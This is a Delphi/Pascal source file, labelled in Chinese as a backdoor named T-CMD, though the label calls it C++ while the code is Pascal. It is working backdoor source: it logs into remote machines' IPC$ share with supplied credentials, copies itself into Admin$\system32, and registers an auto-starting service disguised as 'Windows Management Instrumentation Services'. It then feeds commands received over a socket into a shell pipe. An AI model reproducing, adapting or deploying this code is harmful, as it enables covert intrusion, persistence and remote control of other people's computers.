t_cmd.pas

T-CMD 是一款用 C++ 编写的后门程序

end;

function WriteShell(lpParam: Pointer): Integer;
var
  sdWrite:         TSessionData;
  dwBuffer2Write,
  dwBufferWritten: DWORD;
  szBuffer:        array[0..0] of Char;
  szBuffer2Write:  array[0..BUFFER_SIZE - 1] of Char;
begin
  sdWrite := TSessionData(lpParam^);
  dwBuffer2Write := 0;
  while recv(sdWrite.sClient, szBuffer, 1, 0) <> 0 do
  begin
    szBuffer2Write[dwBuffer2Write] := szBuffer[0];
    Inc(dwBuffer2Write);

    if CompareText(szBuffer2Write, 'exit' + CRLF) = 0 then
    begin
      shutdown(sdWrite.sClient, $02);
      closesocket(sdWrite.sClient);
      Result := 0;
      Exit;
    end;

    if szBuffer[0] = #10 then
    begin
      if WriteFile(sdWrite.hPipe, szBuffer2Write, dwBuffer2Write,
        dwBufferWritten, nil) = False then
      begin
        OutputDebugString('WriteFile in WriteShell(Recv) Error !'#10);
        break;
      end;
      dwBuffer2Write := 0;
    end;
    Sleep(10);
  end;

  shutdown(sdWrite.sClient, $02);
  closesocket(sdWrite.sClient);
  Result := 0;
end;


function ConnectRemote(bConnect: Boolean;
  hpHost, lpUserName, lpPassword: string): Boolean;
var
  lpIPC:       array[0..255] of Char;
  dwErrorCode: DWORD;
  NETRESOURCE: TNetResource;
begin
  StrPCopy(lpIPC, Format('\\%s\ipc$', [hpHost]));
  NetResource.lpLocalName  := nil;
  NetResource.lpRemoteName := lpIPC;
  NetResource.dwType       := RESOURCETYPE_ANY;
  NetResource.lpProvider   := nil;
  if AnsiSameStr(lpPassword, 'NULL') then lpPassword := '';

  if bConnect then
  begin
    Write('Now Connecting ...... ');
    while True do
    begin
      dwErrorCode := WNetAddConnection2(NetResource, PChar(lpPassword),
        PChar(lpUserName), CONNECT_INTERACTIVE);
      if (dwErrorCode = ERROR_ALREADY_ASSIGNED) or
        (dwErrorCode = ERROR_DEVICE_ALREADY_REMEMBERED) then
        WNetCancelConnection2(lpIPC, CONNECT_UPDATE_PROFILE, TRUE)
      else if dwErrorCode = NO_ERROR then
      begin
        Write('Success !'#10);
        break;
      end
      else
      begin
        Write('Failure !'#10);
        Result := False;
        Exit;
      end;
      Sleep(10);
    end;
  end
  else // bConnect <> True
  begin
    Write('Now Disconnecting ... ');
    dwErrorCode := WNetCancelConnection2(lpIPC, CONNECT_UPDATE_PROFILE, TRUE);
    if dwErrorCode = NO_ERROR then
      Write('Success !'#10)
    else
    begin
      Write('Failure !'#10);
      Result := False;
      Exit;
    end;
  end;

  Result := True;
end;

function ChangeServiceConfig2(hService: SC_HANDLE;
  dwInfoLevel: DWORD; lpInfo: Pointer): LongBool; stdcall;
  external 'Advapi32.dll' name 'ChangeServiceConfig2A';

procedure InstallCmdService(lpHost: string);
var
  schSCManager:         SC_HANDLE;
  schService:           SC_HANDLE;
  lpCurrentPath:        array[0..MAX_PATH] of Char;
  lpImagePath:          array[0..MAX_PATH] of Char;
  lpHostName:           string;
  FileData:             WIN32_FIND_DATA;
  hSearch:              THandle;
  dwErrorCode:          DWORD;
  InstallServiceStatus: SERVICE_STATUS;
  lpServiceArgVectors:  PChar;
begin
  if lpHost = '' then
  begin
    GetSystemDirectory(lpImagePath, MAX_PATH);
    strcat(lpImagePath, '\' + N_SERVICE_BINARY_PATH_NAME);
    lpHostName := '';
  end
  else
  begin
    StrPCopy(lpImagePath, Format('\\%s\Admin$\system32\' +
                                 N_SERVICE_BINARY_PATH_NAME, [lpHost]));
    lpHostName := Format('\\%s', [lpHost]);
  end;
  Write('Transmitting File ... ');
  hSearch := FindFirstFile(lpImagePath, FileData);
  if hSearch = INVALID_HANDLE_VALUE then
  begin
    GetModuleFileName(0, lpCurrentPath, MAX_PATH);
    if not CopyFile(lpCurrentPath, lpImagePath, FALSE) then
    begin
      dwErrorCode := GetLastError;
      if dwErrorCode = 5 then
        Write('Failure ... Access is Denied !'#10)
      else
        Write('Failure !'#10);
      Exit;
    end
    else
    begin
      Write('Success !'#10);
    end;
  end
  else // found file
  begin
    Write('already Exists !'#10);
    FindClose(hSearch);
  end;

  schSCManager := OpenSCManager(PChar(lpHostName), nil, SC_MANAGER_ALL_ACCESS);
  if schSCManager = 0 then
  begin
    Write('Open Service Control Manager Database Failure !'#10);
    Exit;
  end;

  Write('Creating Service .... ');
  schService := CreateService(schSCManager, N_SERVICE_NAME,
    'Windows Management Instrumentation Services', SERVICE_ALL_ACCESS,
    SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START,
    SERVICE_ERROR_IGNORE, N_SERVICE_BINARY_PATH_NAME, nil, nil, nil, nil, nil);

  if schService = 0 then
  begin
    dwErrorCode := GetLastError;
    if dwErrorCode <> ERROR_SERVICE_EXISTS then
    begin
      Write('Failure !'#10);
      CloseServiceHandle(schSCManager);
      Exit;
    end
    else
    begin
      Write('already Exists !'#10);
      schService := OpenService(schSCManager, N_SERVICE_NAME, SERVICE_START);
      if schService = 0 then
      begin
        Write('Opening Service .... Failure !'#10);
        CloseServiceHandle(schSCManager);
        Exit;
      end;
    end;
  end
  else
    Write('Success !'#10);

  Write('Starting Service .... ');
  lpServiceArgVectors := nil;
  if not StartService(schService, 0, lpServiceArgVectors) then
  begin
    dwErrorCode := GetLastError;
    if dwErrorCode = ERROR_SERVICE_ALREADY_RUNNING then
    begin
      Write('already Running !'#10);
      CloseServiceHandle(schSCManager);
      CloseServiceHandle(schService);
      Exit;
    end;
  end
  else
    Write('Pending ... ');

  while QueryServiceStatus(schService, InstallServiceStatus) do
  begin
    if InstallServiceStatus.dwCurrentState = SERVICE_START_PENDING then
      Sleep(100)
    else
      Break;
  end;
  if InstallServiceStatus.dwCurrentState <> SERVICE_RUNNING then
    Write('Failure !'#10)
  else
    Write('Success !'#10);
  CloseServiceHandle(schSCManager);
  CloseServiceHandle(schService);
end;

procedure RemoveCmdService(lpHost: string);
var
  schSCManager:        SC_HANDLE;
  schService:          SC_HANDLE;
  lpImagePath:         array[0..MAX_PATH - 1] of Char;
  lpHostName:          string;
  FileData:            WIN32_FIND_DATA;
  RemoveServiceStatus: SERVICE_STATUS;
  hSearch:             THandle;
  dwErrorCode:         DWORD;
begin
  if lpHost = '' then
  begin
    GetSystemDirectory(lpImagePath, MAX_PATH);
    strcat(lpImagePath, '\' + N_SERVICE_BINARY_PATH_NAME);
    lpHostName := '';
  end
  else
  begin
    StrPCopy(lpImagePath, Format('\\%s\Admin$\system32\' +
                                 N_SERVICE_BINARY_PATH_NAME, [lpHost]));
    lpHostName := Format('\\%s', [lpHost]);
  end;

  schSCManager := OpenSCManager(PChar(lpHostName), nil, SC_MANAGER_ALL_ACCESS);
  if schSCManager = 0 then
  begin
    Write('Opening SCM ......... ');
    dwErrorCode := GetLastError;
    if dwErrorCode <> 5 then
      Write('Failure !'#10)
    else
      Write('Failure ... Access is Denied !'#10);
    Exit;
  end;

  schService := OpenService(schSCManager, N_SERVICE_NAME, SERVICE_ALL_ACCESS);
  if schService = 0 then
  begin
    Write('Opening Service ..... ');
    dwErrorCode := GetLastError;
    if dwErrorCode = 1060 then
      Write('no Exists !'#10)
    else
      Write('Failure !'#10);
    CloseServiceHandle(schSCManager);
  end
  else
  begin
    Write('Stopping Service .... ');
    if QueryServiceStatus(schService, RemoveServiceStatus) then
    begin
      if RemoveServiceStatus.dwCurrentState = SERVICE_STOPPED then
        Write('already Stopped !'#10)
      else
      begin
        Write('Pending ... ');
        if ControlService(schService, SERVICE_CONTROL_STOP,
          RemoveServiceStatus) then
        begin
          while RemoveServiceStatus.dwCurrentState = SERVICE_STOP_PENDING do
          begin
            Sleep(10);
            QueryServiceStatus(schService, RemoveServiceStatus);
          end;
          if RemoveServiceStatus.dwCurrentState = SERVICE_STOPPED then
            Write('Success !'#10)
          else
            Write('Failure !'#10);
        end
        else
          Write('Failure !'#10);
      end;
    end
    else
      Write('Query Failure !'#10);

    Write('Removing Service .... ');
    if not DeleteService(schService) then
      Write('Failure !'#10)
    else
      Write('Success !'#10);
  end;

  CloseServiceHandle(schSCManager);
  CloseServiceHandle(schService);

  Write('Removing File ....... ');
  Sleep(1500);
  hSearch := FindFirstFile(lpImagePath, FileData);
  if (hSearch = INVALID_HANDLE_VALUE) then
    Write('no Exists !'#10)
  else
  begin
    if not DeleteFile(lpImagePath) then
      Write('Failure !'#10)
    else
      Write('Success !'#10);
    FindClose(hSearch);
  end;
end;

procedure Start;
begin
  Write(N_START_MESSAGE);
end;

procedure Usage;
begin
  Write(N_USAGE_MESSAGE);
end;

procedure Main;
var
  DispatchTable: array [0..1] of SERVICE_TABLE_ENTRY;
begin
  DispatchTable[0].lpServiceName := N_SERVICE_NAME;
  DispatchTable[0].lpServiceProc := @CmdStart; 
  DispatchTable[1].lpServiceName := nil;
  DispatchTable[1].lpServiceProc := nil;

  if ParamCount = 4 then
  begin
    if not ConnectRemote(TRUE, ParamStr(2), ParamStr(3), ParamStr(4)) then
    begin
      ExitCode := -1;
      Exit;
    end;

    if SameText(ParamStr(1), '-install') then InstallCmdService(ParamStr(2))
    else if SameText(ParamStr(1), '-remove') then RemoveCmdService(ParamStr(2));

    if not ConnectRemote(FALSE, ParamStr(2), ParamStr(3), ParamStr(4)) then
    begin
      ExitCode := -1;
      Exit;
    end;
    Exit;
  end
  else if ParamCount = 1 then
  begin
    if SameText(ParamStr(1), '-install') then InstallCmdService('')
    else if SameText(ParamStr(1), '-remove') then RemoveCmdService('')
    else
    begin
      Start;
      Usage;
    end;
    Exit;
  end;

  StartServiceCtrlDispatcher(DispatchTable[0]);
end;

end.